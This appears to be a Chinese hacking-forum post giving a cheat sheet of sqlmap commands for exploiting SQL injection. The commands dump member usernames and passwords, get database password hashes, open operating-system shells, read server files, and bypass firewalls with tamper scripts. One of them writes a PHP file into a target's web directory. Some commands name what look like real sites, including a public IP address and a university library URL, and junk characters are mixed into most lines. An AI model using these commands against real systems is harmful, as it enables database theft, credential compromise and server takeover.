找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2202|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap+ j( ~" S' m6 e9 _

5 R& P0 c" T7 F3 T! @5 r6 Dupdate :::::>     in the folder   after  execute    following   order : svn update
9 n" d/ M7 M5 U7 z! i3 b& l
! o& n3 P$ t+ m+ W; |. M: Vsqlmap.py -r 1.txt --current-db
# ?' \. B6 U5 d
8 \3 ?( S3 g9 X- v/ S9 @v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
4 {3 V: O  X$ u6 k
) R  q- Q1 h1 t==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 7 G9 x) f) o+ D5 [! U
猜解数据库5 t/ G9 w7 ?) D9 |
./sqlmap.py -u "injection-url" --dbs0 Q( ^( s) _" J5 \, r
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
1 {' \4 z  P7 X1 q* Q6 c
: v$ ^% d. [: @5 r; v* @猜解表名, W& B' s5 x4 Y# u/ i
./sqlmap.py -u "injection-url" -D database_name --tables
$ Q' T" [  X  {; P3 W: g; o1 x
0 W1 J  u2 J! E! r9 T' O  Vsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
: ^. h+ {0 m% V: g9 C5 ^sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 9 D2 X1 t# D/ a( N9 r$ m, _

& I! B4 Z9 q  e/ E' j8 K# bsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
8 {  M5 l7 o- G2 k# |
6 c+ K5 @3 ~; H% @- n* N3 Usqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
2 e( _% v* k; W$ F2 Fsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"; N0 r; e- Y9 h& M! R1 m
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 3 P1 _1 \( O2 J
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
7 i. L. w( o2 u2 d( m4 p1 b" K3 s6 [& r$ I$ q8 S8 t) H9 u) U, \, V5 z6 [
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"# K3 e+ {" p6 i$ t, l
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"6 T" R( t% v# O
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"9 Z$ G* l) M, H4 W7 E, e
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"% ^% ]7 o" T! Z* Q
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
8 I9 N: b( Q. A$ }; k
' @2 E* x5 I% ?4 m; u  w5 lsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了5 O* v! t4 b: X( m
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"' N# O# G+ [/ o8 m* ]1 q
7 ~& ?' p! x' X% r0 R
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"" l# D4 c. Y2 m7 B' `- Q6 d" J
猜解列名8 P. R8 W. ^, t. I
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns1 w$ \" E% j- i' b3 z$ ]' C

! c3 s& K7 r! `0 S; |sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" ! y' G( G8 f  U8 C! K7 T
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
8 \8 @' X7 s* m; Ksqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"6 Q" Y& V" m, P0 e) L, c
8 U7 F3 u# R/ k) p
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
; b) I* g* D1 J0 R  c&submit=Go
# a6 I& b2 W5 R! ^3 }7 X猜解值+ W( H; {( G' a+ |8 t' o$ S
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
" ?' B$ h. `/ j. z: e========================================================) R6 G1 |& e5 X; {+ e
搜索表名中包括mana字符的' ~. E: {- t- T3 P( f+ E1 L; Q
/sqlmap.py -u "injection-url" -T mana --search# T( {5 @7 E. c& J
返回一个交互式sql shell
# U" `; M8 t) b6 o9 K/sqlmap.py -u "injection-url" --sql-shell
9 W, I, M$ H! g读取指定文件(需权限)! M8 k* J- |% ?2 @; k8 p2 ]+ ?
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
: _5 @" _* ?$ |4 C查看当前 用户 及 数据库 % |, t- ?. v9 p2 L+ E$ m9 V( ]
/sqlmap.py -u "injection-url" --current-user --current-db- S2 U1 f- x3 @0 e' x
本地文件 写入 远程目标绝对路径# D+ a/ @% i: r
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
! u4 q9 l, U, ysqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 4 d" j/ B' C8 r- Q
9 C3 Z  @2 t4 t& e- m% b3 }7 W
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径& v1 D8 \1 }9 Q9 i
查看某用的权限/ d- p0 Y+ E' `7 \: h+ U, H4 F
/sqlmap.py -u "injection-url" --privileges -U root
7 e/ f! M6 S/ w$ G查看当前用户是否为dba% T/ ]: y7 a9 h  ^5 `
/sqlmap.py -u "injection-url" --is-dba
3 G% Q9 J/ j; @$ ]; s0 ~  o读取所有数据库用户或指定数据库用户的密码# k" ^+ w. `% _" N+ [
sqlmap.py -r 1.txt --users --passwords. \1 ^3 B2 B( e+ D8 n3 |0 z. N
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" $ g+ l5 ?; H$ n* |
; `& j$ q2 D* {  r4 u& g
/sqlmap.py -u "injection-url" --passwords -U root
' v, y! W* ^9 f0 h
' l3 W4 y6 w& V. _8 O; l  Z5 P  _--start&&--stop 与 --first&&--last 的区别5 Q6 c$ G3 b& }+ r: h
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)* J! s+ H1 P$ z0 I" T
7 u. m: z8 f8 B% f1 w, r
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
7 }* ~3 ~9 p& }4 n9 P* Y" `* O- O1 U$ `/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables3 V0 q. c3 I( d% @7 j1 ~2 T
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns: ]6 w$ q' d. d

) K& z) r/ w/ ]  V: n执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
& v$ r# Z' d0 P0 P; G. A; g/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
3 U& G6 B) ^% b- i" c
5 y* i% J* j% |, M/ i, w! v  W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表